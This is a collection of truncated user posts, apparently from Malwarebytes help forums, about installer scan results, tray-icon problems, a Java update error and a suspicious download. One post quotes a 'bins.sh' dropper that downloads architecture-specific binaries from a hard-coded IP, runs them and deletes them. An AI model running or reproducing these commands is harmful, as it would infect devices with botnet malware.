I was reinstalling Malwarebytes off of the official website, https://www.malwarebytes.com/ And when I downloaded the setup file called "MBSetup.exe" I decided tto run it in virustotal, however quite an uncanny thing came up. Can anyone care to explain why this is, I tested multiple times on the official website this download, so I know it's the real deal one. I even decided to scan an older version of the same downloade setup, the one with a really long name, and it resulted in this, anyone have ANY ideas why this is happening

Hello people of the malwarebytes forums. I'm a new linux user and I've ran into this bins.sh from a site. I don't really know what it does. So if someone could shed some light on it would be greatly appreciated #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mips; chmod +x sirius.mips; ./sirius.mips; rm -rf sirius.mips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mpsl; chmod +x sirius.mpsl; ./sirius.mpsl; rm -rf sirius.mpsl cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget ht

Malwarebytes is not loading into the system tray, however, the task manager says it's running, but I cannot see it on the task bar. I reinstalled the program yesterday after noticing it was not loading at all and the Task Manager was showing loading spams, so uninstalling and reinstalling seemed to have fixed it. But now it does not show up on the system task bar. I am running windows 10 with the latest updates. Including a screenshot.

Alright guys, so I have a few questions about Malwarebytes. I've used this program for a very long time and I am now starting to question if it is really compatible with Windows 8.1. I sometimes, while running a scan, click the little icon on the taskbar, and then click back and.... Bye bye Malwarebytes! It completely quits just like that. Even when I hit the minimize button, it does the same thing. But it seems the scan continues running? It's so weird. And after running Malwarebytes today, this is what I got on the system tray: Okay. REALLY weird. But further looking into this... Th

I just got a notification in my taskbar saying an update to Java is available. I thought "Okay, better update it then", so I went on the START Menu, went to Control Panel and opended Java and updated it. I made sure to UNCHECK to install Ask! Toolbar and stuff. But when it was done, this strange message popped up: GetDefaultBrowserError:2 What does this mean? Is Java trying to change my default browser?? I did a quick Google search of this error message and nothing came up about Java making this error. Thanks for any help! Image is attached!

When my brother opened Firefox I think he went on EB Games website. It popped up asking to downlaod a file, which is strange because it says the file is from youtube, unless of coures there was an embedded youtube video. Hes ben on there before and this never happened but this is the file: o0U2XXgLJkilnSBis0euuJ_-ZDBRpIYn 3.8 KB From: Youtube.com I was tired at the time and said to leave it for me to look at later, so I clicked on cancel for downloading. So I dont have much detail on what the file is but it shows in Firefoxs download history and what I said about it is what it tells me. Oh and
